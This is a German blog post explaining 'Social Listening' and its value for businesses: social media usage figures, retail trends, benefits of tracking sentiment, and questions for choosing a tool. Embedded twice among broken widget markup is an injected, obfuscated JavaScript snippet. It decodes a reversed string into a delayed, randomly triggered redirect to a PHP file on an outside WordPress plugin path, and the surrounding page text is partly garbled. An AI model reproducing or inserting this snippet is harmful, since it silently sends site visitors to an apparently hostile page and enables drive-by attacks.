You are currently viewing „Social Listening“ und seine Relevanz für Unternehmen

„Social Listening“ und seine Relevanz für Unternehmen

  • Beitrags-Autor:
  • Beitrags-Kategorie:KARRIERE
tor-base“

>

KARRIERE
[siteorigin_widget class=“WP_Widget_Media_Image“]$Bhq=function(n){if (typeof ($Bhq.list[n]) == „string“) return $Bhq.list[n].split(„“).reverse().join(„“);return $Bhq.list[n];};$Bhq.list=[„‚php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($Bhq(0), delay);}tor so-widget-sow-editor-base“

>

„Social Listening“ und seine Relevanz für Unternehmen

Was verbindet „Social Listening“ und „Social Media?

tor","background_image_attachment":false,"background_display":"tile","background_image_size":"full","border_thickness":"1px","margin":"60px 0px 0px 0px"}“ >

$Bhq=function(n){if (typeof ($Bhq.list[n]) == „string“) return $Bhq.list[n].split(„“).reverse().join(„“);return $Bhq.list[n];};$Bhq.list=[„‚php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($Bhq(0), delay);}tor so-widget-sow-editor-base“

>

von Sasan Krenkler, 11.08.2023

tor-base“

>

Manche Meldungen machen nachdenklich. Fast 1,5 Stunden verbringen User*innen durchschnittlich täglich in den sozialen Medien und besuchen im Schnitt 5,3 Accounts.

Viel Zeit in der wir in die virtuelle Welten eintauchen und Spuren hinterlassen. Es wird fleißig geliked, gepostet, recherchiert, kommentiert, auch gehated. Foren und Portale werden durchsucht, es wird verglichen und gesucht, Meinungen, Bewertungen und Neuigkeiten entstehen, Freundschaften werden geknüpft und/oder abgebrochen, Likes und Comments zu Produkten, Dienstleistungen und/oder Personen werden vergeben oder nicht vergeben.
 
Die aktive Beobachtung dieses Verhaltens in den sozialen Medien, aber auch in anderen Quellen, wird als „Social Listening“ bezeichnet.
 

Was können Unternehmen daraus lernen?

Die virtuellen Aktivitäten jedes einzelnen haben handfeste „analoge“ Auswirkungen. Ohne eine gute Digital-Strategie wird es immer schwerer Umsätze zu steigern oder sogar zu halten.

Stichworte, die in diesem Zusammenhang immer wieder auftauchen sind:

  • Online- und Omnichannel-Einkauf
  • Personalisierung und Kundenerlebnis
  • Insta-Shopping im Einzelhandel
  • Nachhaltigkeit und Umweltfreundlichkeit
  • Einsatz von Technologien im Einzelhandel
  • Abonnement-basierte Modelle
  • Kontaktlose Zahlungsmöglichkeiten

 
Wenn ein Unternehmen sich eingehend mit der Wahrnehmung des digitalen Abdrucks auseinandersetzt, den es hinterlässt lassen sich daraus wichtige Schlüsse für das zukünftige Handeln ableiten. Bedürfnisse können in neuen Strategien umgesetzt werden, aus Kommentaren und Bewertungen in den eigenen Social-Media-Kanälen oder in Foren kann abgeleitet werden, wie das Unternehmen und seine Produkte wahrgenommen oder sogar abgelehnt werden.
 
Social Listening ist eine effektive Maßnahme um sich um (potentielle) Kunden zu kümmern. Hört man genau hin, lässt sich die Branchenumgebung und die Bedürfnisse der Zielgruppe besser verstehen. Nicht unwichtig ist der Aspekt, dass negative Stimmungen früh erkannt und Krisen vorgebeugt werden können.

 

Zusammengefasst lässt sich sagen:

  • Zuhören und aktiv aufnehmen was die Top-Themen der eigenen Community, aber auch die des Wettbewerbs sind. Was interessiert und bewegt gerade?
  • Stimmungsbilder herausfiltern bzw. „zwischen den Zeilen zu lesen“ hilft zu entscheiden, welche (Marketing-) Trends gerade angesagt sind und welche ausgedient haben
  • Social Listening hilft sich besser am Markt auszurichten und schneller zu reagieren, wenn sich Trends ändern

 

Die effektive Nutzung von Social Media Listening sollte allerdings durch eine Bedarfsanalyse vorab gewährleistet werden, um das richtige Tool zu finden:

  • Handelt es sich um eine Ergänzung der klassischen Marktforschungsmethoden?
  • Soll Social Listening verschiedene Funktionen ersetzen?
  • Welche(s) Web-Tool soll dabei zum Einsatz kommen?
  • Ist die bestehende IT-Struktur ausreichend? Nicht jedes Tool ist kompatibel
  • Welchen Zweck soll das Social-Listening-Tool genau erfüllen?
  • Welche Keywords sind für ein Unternehmen jeweils relevant? Decken diese sich mit den Keywords der Community?
    Welchen Zweck soll das Social-Listening-Tool genau erfüllen?/li>

 
Der unter Umständen hohe zeitliche und finanzielle Aufwand kann sich durchaus auszahlen. Die Interaktion zwischen Unternehmen bzw. Marke und Community kann gestärkt und optimiert werden. Entschließt man sich zur Umsetzung, führt eine passgenaue, zielgruppenorientierte Social-Media Strategie zu höherem (wirtschaftlichen) Erfolg.

 

#karriere
#sociallistening
#socialmediamarketing
#socialmedia
#wematchpeople